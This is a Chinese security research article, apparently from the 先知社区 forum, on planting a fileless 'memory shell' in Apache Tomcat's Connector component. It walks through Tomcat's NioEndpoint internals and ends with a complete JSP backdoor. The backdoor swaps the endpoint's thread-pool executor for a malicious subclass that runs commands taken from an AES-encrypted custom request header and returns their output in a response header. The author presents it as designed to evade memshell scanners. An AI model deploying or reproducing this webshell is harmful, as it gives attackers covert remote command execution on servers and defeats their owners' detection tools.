暂无简介
前言
PS:本文均只代表个人浅薄观点,若有错误或理解不足请指出。
Tomcat为了自身的可扩展性,各组件之间在很大程度上都进行了解耦。
而memshell scanner等类似内存马查杀工具,大多都是针对Container内的注册服务进行扫描。
那我们是否可以在Connector内进行内存马的注入?
正文
前置知识
先来看看Connector的具体实现。
在Tomcat笔记(其一)中我们曾提到,Connector主要由ProtocolHandler与Adapter构成。
而ProtocolHandler又主要由Endpoint与Processor组成:
根据实现的不同,ProtocolHandler又有如下分类:
本文中,我们主要关注一下Http11NioProtocol这个实现。
Endpoint
Endpoint是ProtocolHandler的组成之一,而NioEndpoint是Http11NioProtocl中的实现。
Endpoint五大组件:
- LimitLatch:连接控制器,负责控制最大的连接数
- Acceptor:负责接收新的连接,然后返回一个Channel对象给Poller
- Poller:可以将其看成是NIO中Selector,负责监控Channel的状态
- SocketProcessor:可以看成是一个被封装的任务类
- Executor:Tomcat自己扩展的线程池,用来执行任务类
LimitLatch
LimitLatch主要是用来控制Tomcat所能接收的最大数量连接,如果超过了此连接,那么Tomcat就会将此连接线程阻塞等待,等里面有其他连接释放了再消费此连接。
public class LimitLatch {
private static final Log log = LogFactory.getLog(LimitLatch.class);
private class Sync extends AbstractQueuedSynchronizer {
private static final long serialVersionUID = 1L;
public Sync() {
}
@Override
protected int tryAcquireShared(int ignored) {
long newCount = count.incrementAndGet();
if (!released && newCount > limit) {
// Limit exceeded
count.decrementAndGet();
return -1;
} else {
return 1;
}
}
@Override
protected boolean tryReleaseShared(int arg) {
count.decrementAndGet();
return true;
}
}
private final Sync sync;
//当前连接数
private final AtomicLong count;
//最大连接数
private volatile long limit;
private volatile boolean released = false;
}
//在AbstractEndpoint类中实现的方法
......
protected LimitLatch initializeConnectionLatch() {
if (this.maxConnections == -1) {
return null;
} else {
if (this.connectionLimitLatch == null) {
this.connectionLimitLatch = new LimitLatch((long)this.getMaxConnections());
}
return this.connectionLimitLatch;
}
}
protected void releaseConnectionLatch() {
LimitLatch latch = this.connectionLimitLatch;
if (latch != null) {
latch.releaseAll();
}
this.connectionLimitLatch = null;
}
protected void countUpOrAwaitConnection() throws InterruptedException {
if (this.maxConnections != -1) {
LimitLatch latch = this.connectionLimitLatch;
if (latch != null) {
latch.countUpOrAwait();
}
}
}
protected long countDownConnection() {
if (this.maxConnections == -1) {
return -1L;
} else {
LimitLatch latch = this.connectionLimitLatch;
if (latch != null) {
long result = latch.countDown();
if (result < 0L) {
this.getLog().warn(sm.getString("endpoint.warn.incorrectConnectionCount"));
}
return result;
} else {
return -1L;
}
}
}
......
Acceptor
Acceptor用于接收链接。
//AbstractEndpoint中的原型
......
public class Acceptor<U> implements Runnable {
private static final int INITIAL_ERROR_DELAY = 50;
private static final int MAX_ERROR_DELAY = 1600;
@Override
public void run() {
int errorDelay = 0;
// 循环,直到接收到一个关闭命令
while (endpoint.isRunning()) {
// 循环,如果Endpoint被暂停则循环sleep
while (endpoint.isPaused() && endpoint.isRunning()) {
state = AcceptorState.PAUSED;
try {
Thread.sleep(50); // 50毫秒拉取一次endpoint运行状态
} catch (InterruptedException e) {
}
}
if (!endpoint.isRunning()) {
break;
}
state = AcceptorState.RUNNING;
try {
endpoint.countUpOrAwaitConnection(); // 判断最大连接数
if (endpoint.isPaused()) {
continue;
}
U socket = null;
try {
socket = endpoint.serverSocketAccept(); // 创建一个socketChannel接收连接
} catch (Exception ioe) {
endpoint.countDownConnection();
if (endpoint.isRunning()) {
errorDelay = handleExceptionWithDelay(errorDelay); // 延迟异常处理
throw ioe; // 重新扔出异常给c1处捕获
} else {
break;
}
}
errorDelay = 0; // 成功接收之后重置延时处理异常时间
if (endpoint.isRunning() && !endpoint.isPaused()) {
// setSocketOptions()将Socket传给相应processor处理
if (!endpoint.setSocketOptions(socket)) {
endpoint.closeSocket(socket);
}
} else {
endpoint.destroySocket(socket); // 否则destroy掉该socketChannel
}
} catch (Throwable t) { // c1
ExceptionUtils.handleThrowable(t); // 处理延迟异常
String msg = sm.getString("endpoint.accept.fail");
if (t instanceof Error) {
... // 日志记录
}
}
}
state = AcceptorState.ENDED; // 标记状态为ENDED
}
protected int handleExceptionWithDelay(int currentErrorDelay) {
if (currentErrorDelay > 0) {
try {
Thread.sleep(currentErrorDelay);
} catch (InterruptedException e) {
// Ignore
}
}
// 异常处理
if (currentErrorDelay == 0) {
return INITIAL_ERROR_DELAY; // c2
} else if (currentErrorDelay < MAX_ERROR_DELAY) {
return currentErrorDelay * 2;
} else {
return MAX_ERROR_DELAY;
}
}
}
......
//在AbstractEndpoint类中开启Acceptor线程
......
protected void startAcceptorThreads() {
int count = getAcceptorThreadCount();
acceptors = new ArrayList<>(count);
for (int i = 0; i < count; i++) {
Acceptor<U> acceptor = new Acceptor<>(this);
String threadName = getName() + "-Acceptor-" + i;
acceptor.setThreadName(threadName);
acceptors.add(acceptor);
Thread t = new Thread(acceptor, threadName);
t.setPriority(getAcceptorThreadPriority());
t.setDaemon(getDaemon());
t.start();
}
}
......
//NioEndpoint中具体实现的对SocketChannel的处理
protected class Acceptor extends org.apache.tomcat.util.net.AbstractEndpoint.Acceptor {
protected Acceptor() {
}
public void run() {
byte errorDelay = 0;
while(NioEndpoint.this.running) {
while(NioEndpoint.this.paused && NioEndpoint.this.running) {
this.state = AcceptorState.PAUSED;
try {
Thread.sleep(50L);
} catch (InterruptedException var4) {
}
}
if (!NioEndpoint.this.running) {
break;
}
this.state = AcceptorState.RUNNING;
try {
NioEndpoint.this.countUpOrAwaitConnection();
SocketChannel socket = null;
try {
socket = NioEndpoint.this.serverSock.accept();
} catch (IOException var5) {
NioEndpoint.this.countDownConnection();
if (!NioEndpoint.this.running) {
break;
}
NioEndpoint.this.handleExceptionWithDelay(errorDelay);
throw var5;
}
errorDelay = 0;
if (NioEndpoint.this.running && !NioEndpoint.this.paused) {
if (!NioEndpoint.this.setSocketOptions(socket)) {
this.closeSocket(socket);
}
} else {
this.closeSocket(socket);
}
} catch (Throwable var6) {
ExceptionUtils.handleThrowable(var6);
NioEndpoint.log.error(AbstractEndpoint.sm.getString("endpoint.accept.fail"), var6);
}
}
this.state = AcceptorState.ENDED;
}
private void closeSocket(SocketChannel socket) {
NioEndpoint.this.countDownConnection();
try {
socket.socket().close();
} catch (IOException var4) {
if (NioEndpoint.log.isDebugEnabled()) {
NioEndpoint.log.debug(AbstractEndpoint.sm.getString("endpoint.err.close"), var4);
}
}
try {
socket.close();
} catch (IOException var3) {
if (NioEndpoint.log.isDebugEnabled()) {
NioEndpoint.log.debug(AbstractEndpoint.sm.getString("endpoint.err.close"), var3);
}
}
}
}
Poller
public class Poller implements Runnable {
......
@Override
public void run() {
// Loop until destroy() is called
while (true) {
boolean hasEvents = false;
try {
if (!close) {
//查看是否有连接进来,如果有就将Channel注册进Selector中
hasEvents = events();
}
if (close) {
events();
timeout(0, false);
try {
selector.close();
} catch (IOException ioe) {
log.error(sm.getString("endpoint.nio.selectorCloseFail"), ioe);
}
break;
}
} catch (Throwable x) {
ExceptionUtils.handleThrowable(x);
log.error(sm.getString("endpoint.nio.selectorLoopError"), x);
continue;
}
if (keyCount == 0) {
hasEvents = (hasEvents | events());
}
Iterator<SelectionKey> iterator =
keyCount > 0 ? selector.selectedKeys().iterator() : null;
// Walk through the collection of ready keys and dispatch
// any active event.
while (iterator != null && iterator.hasNext()) {
SelectionKey sk = iterator.next();
NioSocketWrapper socketWrapper = (NioSocketWrapper) sk.attachment();
// Attachment may be null if another thread has called
// cancelledKey()
if (socketWrapper == null) {
iterator.remove();
} else {
iterator.remove();
processKey(sk, socketWrapper);
}
}
// Process timeouts
timeout(keyCount,hasEvents);
}
getStopLatch().countDown();
}
……
}
调用events()方法,查看队列中是否有Pollerevent事件,如果有就将其取出,然后把里面的Channel取出来注册到该Selector中,然后不断轮询所有注册过的Channel查看是否有事件发生。
当有事件发生时,则调用SocketProcessor交给Executor执行。
SocketProcessor
protected class SocketProcessor extends SocketProcessorBase<NioChannel> {
public SocketProcessor(SocketWrapperBase<NioChannel> socketWrapper, SocketEvent event) {
super(socketWrapper, event);
}
protected void doRun() {
NioChannel socket = (NioChannel)this.socketWrapper.getSocket();
SelectionKey key = socket.getIOChannel().keyFor(socket.getPoller().getSelector());
try {
int handshake = -1;
try {
if (key != null) {
if (socket.isHandshakeComplete()) {
handshake = 0;
} else if (this.event != SocketEvent.STOP && this.event != SocketEvent.DISCONNECT && this.event != SocketEvent.ERROR) {
handshake = socket.handshake(key.isReadable(), key.isWritable());
this.event = SocketEvent.OPEN_READ;
} else {
handshake = -1;
}
}
} catch (IOException var12) {
handshake = -1;
if (NioEndpoint.log.isDebugEnabled()) {
NioEndpoint.log.debug("Error during SSL handshake", var12);
}
} catch (CancelledKeyException var13) {
handshake = -1;
}
if (handshake == 0) {
SocketState state = SocketState.OPEN;
if (this.event == null) {
state = NioEndpoint.this.getHandler().process(this.socketWrapper, SocketEvent.OPEN_READ);
} else {
state = NioEndpoint.this.getHandler().process(this.socketWrapper, this.event);//关键在于调用对应的handler来执行这两个process方法。
}
if (state == SocketState.CLOSED) {
NioEndpoint.this.close(socket, key);
}
} else if (handshake == -1) {
NioEndpoint.this.getHandler().process(this.socketWrapper, SocketEvent.CONNECT_FAIL);
NioEndpoint.this.close(socket, key);
} else if (handshake == 1) {
this.socketWrapper.registerReadInterest();
} else if (handshake == 4) {
this.socketWrapper.registerWriteInterest();
}
} catch (CancelledKeyException var14) {
socket.getPoller().cancelledKey(key);
} catch (VirtualMachineError var15) {
ExceptionUtils.handleThrowable(var15);
} catch (Throwable var16) {
NioEndpoint.log.error("", var16);
socket.getPoller().cancelledKey(key);
} finally {
this.socketWrapper = null;
this.event = null;
if (NioEndpoint.this.running && !NioEndpoint.this.paused) {
NioEndpoint.this.processorCache.push(this);
}
}
}
}
Executor
见下文。
Executor以及恶意Executor的实现:
//删掉了很多注解,有兴趣可以自行查阅。
public interface Executor {
/**
* Executes the given command at some time in the future. The command
* may execute in a new thread, in a pooled thread, or in the calling
* thread, at the discretion of the {@code Executor} implementation.
*
* @param command the runnable task
* @throws RejectedExecutionException if this task cannot be
* accepted for execution
* @throws NullPointerException if command is null
*/
void execute(Runnable command);
}
Executor其实是Tomcat定制版的线程池,具体设计理论我们无需细究,但有一点我们值得关注:
在Tomcat中Executor由Service维护,因此同一个Service中的组件可以共享一个线程池。如果没有定义任何线程池,相关组件( 如Endpoint)会自动创建线程池,此时,线程池不再共享。
(这也是为什么之前我获取Service直接往executors组里添加executor但却并不生效的原因。)
可以看到这里是直接获取的EndPoint自己启动的TreadPoolExecutor类:
并且他的关键调用方法就在下一行 : executor.execute()
找到其核心处理逻辑后,我们只需继承它,并重写该方法将恶意逻辑写入其中。
public class threadexcutor extends ThreadPoolExecutor {
......
public threadexcutor(int corePoolSize, int maximumPoolSize, long keepAliveTime, TimeUnit unit, BlockingQueue<Runnable> workQueue, ThreadFactory threadFactory, RejectedExecutionHandler handler) {
super(corePoolSize, maximumPoolSize, keepAliveTime, unit, workQueue, threadFactory, handler);
}
......
@Override
public void execute(Runnable command) {
System.out.println("123");
//Evil code here
this.execute(command, 0L, TimeUnit.MILLISECONDS);
}
......
}
通过AbstractEndpoint中的setExecutor方法将原本的executor置换为我们的恶意类。
置换后,Endpoint处理所使用的executor成功变为我们的恶意类:
实现交互
获取命令
根据上文中的前置知识和Tomcat笔记(其一)中我们所描述的,标准的ServletRequest需要经过Processor的封装后才可获得,如果我们想要把命令放在header中传入,该如何实现?
实现的方法肯定不止一种,此处我借用java内存搜索工具找到一处位于NioEndpoint中的nioChannels的appReadBufHandler,很明显其中的Buffer存放着我们所需要的request。
将命令字段提取处理即可。
public String getRequest() {
try {
Thread[] threads = (Thread[]) ((Thread[]) getField(Thread.currentThread().getThreadGroup(), "threads"));
for (Thread thread : threads) {
if (thread != null) {
String threadName = thread.getName();
if (!threadName.contains("exec") && threadName.contains("Acceptor")) {
Object target = getField(thread, "target");
if (target instanceof Runnable) {
try {
Object[] objects = (Object[]) getField(getField(getField(target, “this$0”), “nioChannels”), “stack”);
ByteBuffer heapByteBuffer = (ByteBuffer) getField(getField(objects[0], “appReadBufHandler”), “byteBuffer”);
String a = new String(heapByteBuffer.array(), “UTF-8”);
if (a.indexOf(“blue0”) > -1) {
System.out.println(a.indexOf(“blue0”));
System.out.println(a.indexOf(“\r”, a.indexOf(“blue0”)) - 1);
String b = a.substring(a.indexOf(“blue0”) + “blue0”.length() + 1, a.indexOf(“\r”, a.indexOf(“blue0”)) - 1);
//System.out.println(b);
return b;
}
} catch (Exception var11) {
System.out.println(var11);
continue;
}
}
}
}
}
} catch (Exception ignored) {
}
return new String();
}
实现回显
注入内存马的位置在Processor处理生成标准ServletRequest之前,显然完整的ServletResponse要在Containor处理完成之后才会生成,那我们要如何解决回显问题?
想法一:
直接在此处使用Socket与client端进行通信,以字节流的形式传输数据。
(理论上可行,未测试)
想法二:
主要利用tomcat在处理request时的特性。
AbstractProcessor在初始化时就会进行Tomcat Request与Response的创建,继承了AbstractProcessor的Http11Processor也是如此:
......
public AbstractProcessor(AbstractEndpoint<?> endpoint) {
this(endpoint, new Request(), new Response());
}
......
protected AbstractProcessor(AbstractEndpoint<?> endpoint, Request coyoteRequest, Response coyoteResponse) {
this.hostNameC = new char[0];
this.asyncTimeout = -1L;
this.asyncTimeoutGeneration = 0L;
this.socketWrapper = null;
this.errorState = ErrorState.NONE;
this.endpoint = endpoint;
this.asyncStateMachine = new AsyncStateMachine(this);
this.request = coyoteRequest;
this.response = coyoteResponse;
this.response.setHook(this);
this.request.setResponse(this.response);
this.request.setHook(this);
this.userDataHelper = new UserDataHelper(this.getLog());
}
......
并且Response是会封装在Request对象中的:
在Container中的逻辑处理完之后,Http11Processor会继续对我们的response进行封装:
所以我们只需将命令执行的结果提前放入Tomcat的response中即可,这里我选择的是header。
PS:最开始的时候走了点弯路,想要把最开始的response结构体中的buffer部分找出来直接put(byte[])进去,后来发现byteBuffer扩容起来很麻烦,而且可能会存在后续tomcat处理将回显部分覆盖的情况。
so这里直接使用response.addHeader(),将结果放入header中。
public void getResponse(byte[] res) {
try {
Thread[] threads = (Thread[]) ((Thread[]) getField(Thread.currentThread().getThreadGroup(), "threads"));
for (Thread thread : threads) {
if (thread != null) {
String threadName = thread.getName();
if (!threadName.contains("exec") && threadName.contains("Acceptor")) {
Object target = getField(thread, "target");
if (target instanceof Runnable) {
try {
ArrayList objects = (ArrayList) getField(getField(getField(getField(target, "this$0"), "handler"), "global"),"processors");
for (Object tmp_object:objects) {
RequestInfo request = (RequestInfo)tmp_object;
Response response = (Response) getField(getField(request, "req"), "response");
response.addHeader("Server",new String(res,"UTF-8"));
//System.out.print("buffer add");
}
} catch (Exception var11) {
continue;
}
}
}
}
}
} catch (Exception ignored) {
}
}
Final
为通信的隐蔽性,最后做了一下AES加密:
最终实现的效果为,若检测到request请求中包含我们自定义的header头则会执行相关恶意操作,并在response的自定义header中返回,否则则为正常业务流量:
同样的,因为不是在Container中实现的内存马,tomcat-memshell-scanner无法检测到:
jsp_demo
<%@ page import="org.apache.tomcat.util.net.NioEndpoint" %>
<%@ page import="org.apache.tomcat.util.threads.ThreadPoolExecutor" %>
<%@ page import="java.util.concurrent.TimeUnit" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="java.util.concurrent.BlockingQueue" %>
<%@ page import="java.util.concurrent.ThreadFactory" %>
<%@ page import="java.nio.ByteBuffer" %>
<%@ page import="java.util.ArrayList" %>
<%@ page import="org.apache.coyote.RequestInfo" %>
<%@ page import="org.apache.coyote.Response" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.nio.charset.StandardCharsets" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%!
public static final String DEFAULT_SECRET_KEY = “blueblueblueblue”;
private static final String AES = “AES”;
private static final byte[] KEY_VI = “blueblueblueblue”.getBytes();
private static final String CIPHER_ALGORITHM = “AES/CBC/PKCS5Padding”;
private static java.util.Base64.Encoder base64Encoder = java.util.Base64.getEncoder();
private static java.util.Base64.Decoder base64Decoder = java.util.Base64.getDecoder();
public static String decode(String key, String content) {
try {
javax.crypto.SecretKey secretKey = new javax.crypto.spec.SecretKeySpec(key.getBytes(), AES);
javax.crypto.Cipher cipher = javax.crypto.Cipher.getInstance(CIPHER_ALGORITHM);
cipher.init(javax.crypto.Cipher.DECRYPT_MODE, secretKey, new javax.crypto.spec.IvParameterSpec(KEY_VI));
byte[] byteContent = base64Decoder.decode(content);
byte[] byteDecode = cipher.doFinal(byteContent);
return new String(byteDecode, java.nio.charset.StandardCharsets.UTF_8);
} catch (Exception e) {
e.printStackTrace();
}
return null;
}
public static String encode(String key, String content) {
try {
javax.crypto.SecretKey secretKey = new javax.crypto.spec.SecretKeySpec(key.getBytes(), AES);
javax.crypto.Cipher cipher = javax.crypto.Cipher.getInstance(CIPHER_ALGORITHM);
cipher.init(javax.crypto.Cipher.ENCRYPT_MODE, secretKey, new javax.crypto.spec.IvParameterSpec(KEY_VI));
byte[] byteEncode = content.getBytes(java.nio.charset.StandardCharsets.UTF_8);
byte[] byteAES = cipher.doFinal(byteEncode);
return base64Encoder.encodeToString(byteAES);
} catch (Exception e) {
e.printStackTrace();
}
return null;
}
public Object getField(Object object, String fieldName) {
Field declaredField;
Class clazz = object.getClass();
while (clazz != Object.class) {
try {
declaredField = clazz.getDeclaredField(fieldName);
declaredField.setAccessible(true);
return declaredField.get(object);
} catch (NoSuchFieldException | IllegalAccessException e) {
}
clazz = clazz.getSuperclass();
}
return null;
}
public Object getStandardService() {
Thread[] threads = (Thread[]) this.getField(Thread.currentThread().getThreadGroup(), “threads”);
for (Thread thread : threads) {
if (thread == null) {
continue;
}
if ((thread.getName().contains(“Acceptor”)) && (thread.getName().contains(“http”))) {
Object target = this.getField(thread, “target”);
Object jioEndPoint = null;
try {
jioEndPoint = getField(target, “this$0”);
} catch (Exception e) {
}
if (jioEndPoint == null) {
try {
jioEndPoint = getField(target, “endpoint”);
} catch (Exception e) {
new Object();
}
} else {
return jioEndPoint;
}
}
}
return new Object();
}
public class threadexcutor extends ThreadPoolExecutor {
public threadexcutor(int corePoolSize, int maximumPoolSize, long keepAliveTime, TimeUnit unit, BlockingQueue<Runnable> workQueue, ThreadFactory threadFactory, RejectedExecutionHandler handler) {
super(corePoolSize, maximumPoolSize, keepAliveTime, unit, workQueue, threadFactory, handler);
}
public String getRequest() {
try {
Thread[] threads = (Thread[]) ((Thread[]) getField(Thread.currentThread().getThreadGroup(), “threads”));
for (Thread thread : threads) {
if (thread != null) {
String threadName = thread.getName();
if (!threadName.contains(“exec”) && threadName.contains(“Acceptor”)) {
Object target = getField(thread, “target”);
if (target instanceof Runnable) {
try {
Object[] objects = (Object[]) getField(getField(getField(target, “this$0”), “nioChannels”), “stack”);
ByteBuffer heapByteBuffer = (ByteBuffer) getField(getField(objects[0], “appReadBufHandler”), “byteBuffer”);
String a = new String(heapByteBuffer.array(), “UTF-8”);
if (a.indexOf(“blue0”) > -1) {
System.out.println(a.indexOf(“blue0”));
System.out.println(a.indexOf(“\r”, a.indexOf(“blue0”)) - 1);
String b = a.substring(a.indexOf(“blue0”) + “blue0”.length() + 1, a.indexOf(“\r”, a.indexOf(“blue0”)) - 1);
b = decode(DEFAULT_SECRET_KEY, b);
return b;
}
} catch (Exception var11) {
System.out.println(var11);
continue;
}
}
}
}
}
} catch (Exception ignored) {
}
return new String();
}
public void getResponse(byte[] res) {
try {
Thread[] threads = (Thread[]) ((Thread[]) getField(Thread.currentThread().getThreadGroup(), “threads”));
for (Thread thread : threads) {
if (thread != null) {
String threadName = thread.getName();
if (!threadName.contains(“exec”) && threadName.contains(“Acceptor”)) {
Object target = getField(thread, “target”);
if (target instanceof Runnable) {
try {
ArrayList objects = (ArrayList) getField(getField(getField(getField(target, “this$0”), “handler”), “global”), “processors”);
for (Object tmp_object : objects) {
RequestInfo request = (RequestInfo) tmp_object;
Response response = (Response) getField(getField(request, “req”), “response”);
response.addHeader(“Server-token”, encode(DEFAULT_SECRET_KEY,new String(res, “UTF-8”)));
}
} catch (Exception var11) {
continue;
}
}
}
}
}
} catch (Exception ignored) {
}
}
@Override
public void execute(Runnable command) {
//System.out.println(“123”);
String cmd = getRequest();
if (cmd.length() > 1) {
try {
Runtime rt = Runtime.getRuntime();
Process process = rt.exec(cmd);
java.io.InputStream in = process.getInputStream();
java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);
java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);
String s = “”;
String tmp = “”;
while ((tmp = stdInput.readLine()) != null) {
s += tmp;
}
if (s != “”) {
byte[] res = s.getBytes(StandardCharsets.UTF_8);
getResponse(res);
}
} catch (IOException e) {
e.printStackTrace();
}
}
this.execute(command, 0L, TimeUnit.MILLISECONDS);
}
}
%>
<%
NioEndpoint nioEndpoint = (NioEndpoint) getStandardService();
ThreadPoolExecutor exec = (ThreadPoolExecutor) getField(nioEndpoint, “executor”);
threadexcutor exe = new threadexcutor(exec.getCorePoolSize(), exec.getMaximumPoolSize(), exec.getKeepAliveTime(TimeUnit.MILLISECONDS), TimeUnit.MILLISECONDS, exec.getQueue(), exec.getThreadFactory(), exec.getRejectedExecutionHandler());
nioEndpoint.setExecutor(exe);
%>
后记
抛砖引玉,按照这个思路,Connector中应该还有其他组件内存马可以实现。
请忽略我拙劣的coding能力。
感谢su18师傅和园长的鞭策。
参考:
https://juejin.cn/post/6844903874122383374
https://cloud.tencent.com/developer/article/1745954
http://chujunjie.top/2019/04/21/Tomcat源码学习笔记-Connector组件-一/
- 本文作者: bluE0
- 本文来源: 先知社区
- 原文链接: https://xz.aliyun.com/t/11593
- 版权声明: 除特别声明外,本文各项权利归原文作者和发表平台所有。转载请注明出处!